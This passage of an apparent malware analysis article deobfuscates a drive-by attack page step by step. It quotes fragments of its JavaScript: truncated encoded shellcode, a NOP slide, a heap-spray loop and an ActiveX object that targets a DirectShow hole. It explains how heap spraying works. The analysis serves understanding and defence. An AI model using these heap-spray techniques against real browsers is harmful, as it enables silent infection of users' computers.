Sprayer at work
So the only reason for obfuscating all this code is the integration of another iFrame. We start again at the beginning: Download file and open in editor. What we find is another long block of encoded characters:
var z4wurLU =
"%uA164%u0018%u0000%u408B%u8B30
[ ... ]
%u6944%u6572%u7463%u5F58%u5344";
And this time, the whole thing is unpacked via unescape()
:
var ZqEs8Ui = unescape(z4wurLU);
However, these encoded hex values look more like shellcode to me – machine-code instructions that are to be injected via a security hole and then executed. The next line confirms this:
var D4aFw4Q = unescape("%u9" + "090%u9" + "09" + "0");
It contains several instances of the 0x90 hex code. This is the sequence for the x86 machine instruction "No Operation" – that is, "do nothing", called NOP in short. Many exploits use this instruction as a filler. Then another loop:
while(...)D4aFw4Q += D4aFw4Q;
Since this is nested in a further loop, the hdwPhXe
variable ends up receiving several thousand NOP instructions. I knew it – this is somebody building what is called a NOP slide.
NOP slides are often used in heap spraying attacks. Exploit authors tend to face the problem that, although they can redirect a jump in the regular code, they don't quite know where to jump to. It is usually impossible to predict which memory address the exploit code will end up in.
Therefore, authors simply overwrite the entire memory with a large number of these long do-nothing slides and place the intended code at the end. Then they instruct the program to jump to a random address, knowing that it is bound to hit one of the slides, do "nothing" a few thousand times and finally end up at the injected code.
And here's the heap spraying:
var fa5iZhc = new Array();
for (IF7Dfmj = 0; IF7Dfmj < 350; IF7Dfmj++ ){
fa5iZhc[IF7Dfmj] = hdwPhXe + ZqEs8Ui
}
This code sets up 350 of these slides in memory, each of them including a few thousand NOPs and then the shellcode from ZqEs8Ui
. The stage is set for the main act! And here it is:
var bC44pzT = document.createElement('object');
....
bC44pzT.data = 'dx_ds.gif';
bC44pzT.classid = 'clsid:0955AC62-BF2E- 4CBA-A2B9-A63F772D46CF';
One of the first hits when searching the internet for class ID 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
is : Web pages infect Windows PCs via new DirectShow hole